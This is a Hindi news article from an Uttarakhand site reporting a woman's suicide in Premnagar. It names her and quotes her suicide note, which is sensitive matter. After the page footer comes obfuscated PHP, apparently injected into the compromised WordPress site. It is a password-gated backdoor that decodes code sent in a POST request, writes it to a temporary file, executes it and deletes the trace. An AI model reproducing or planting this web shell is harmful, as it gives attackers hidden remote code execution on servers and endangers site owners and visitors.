Uttarakhand: सुसाइड नोट में पति से मांगी माफी और फांसी पर झूल गई महिला, जाने क्या है पूरा मामला

Uttarakhand Press 21 June 2023: प्रेमनगर में एक महिला ने फांसी लगाकर आत्महत्या कर ली। कमरे से एक सुसाइड नोट भी बरामद हुआ है। इसमें उसने लिखा है कि मेरी वजह से सब परेशान हैं…मेरे हसबैंड बहुत अच्छे हैं…मैं किसी से प्यार करने के काबिल नहीं हूं…। पुलिस इस सुसाइड नोट की जांच कर रही है। शव को पोस्टमार्टम के लिए मोर्चरी में रखवाया गया है। आत्महत्या के कारणों की जांच की जा रही है।

एसओ प्रेमनगर पीडी भट्ट ने बताया कि मंगलवार सुबह करीब नौ बजे प्रेमनगर विंग नंबर एक से सूचना आई थी कि यहां एक महिला ने आत्महत्या कर ली है। पुलिस मौके पर पहुंची तो देखा कि महिला चुन्नी के सहारे फंदे पर लटकी हुई थी। उसे नीचे उतारकर एंबुलेंस से अस्पताल पहुंचाया गया। लेकिन, डॉक्टरों ने उसे मृत घोषित कर दिया। महिला की पहचान गुरप्रीत पत्नी मंजीत के रूप में हुई है।

मैं किसी से प्यार के काबिल नहीं हूं…
मंजीत कपड़ों का व्यापार करते हैं। वह मंगलवार सुबह करीब साढ़े चार बजे किसी काम से घर से बाहर गए थे। इसके बाद सुबह करीब साढ़े आठ बजे महिला की देवरानी वहां पहुंची तो देखा कि बेडरूम में गुरप्रीत ने फांसी लगाई हुई थी। एसओ ने बताया कि सुसाइड नोट को जांच के लिए फॉरेंसिक लैब भिजवाया जा रहा है।

सूत्रों के मुताबिक सुसाइड नोट में लिखा है कि मेरी वजह से सब परेशान हैं। मेरे हसबैंड बहुत अच्छे हैं। मैं किसी से प्यार के काबिल नहीं हूं। मुझे माफ कर दो। नैंसी बहुत सपोर्ट करती है। मेरी वजह से जसमत बीमार हो गया। मुझे सब माफ कर दो।

Read Previous

Uttarakhand: वाहनों की अधिकतम रफ्तार हुई तय, नियमों का नहीं किया पालन तो होगी कार्रवाई

Read Next

हल्द्वानी: कार को तेज रफ्तार बस ने मार दी टक्कर, हादसे में कपड़ा व्यवसायी घायल, पत्नी की मौत

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}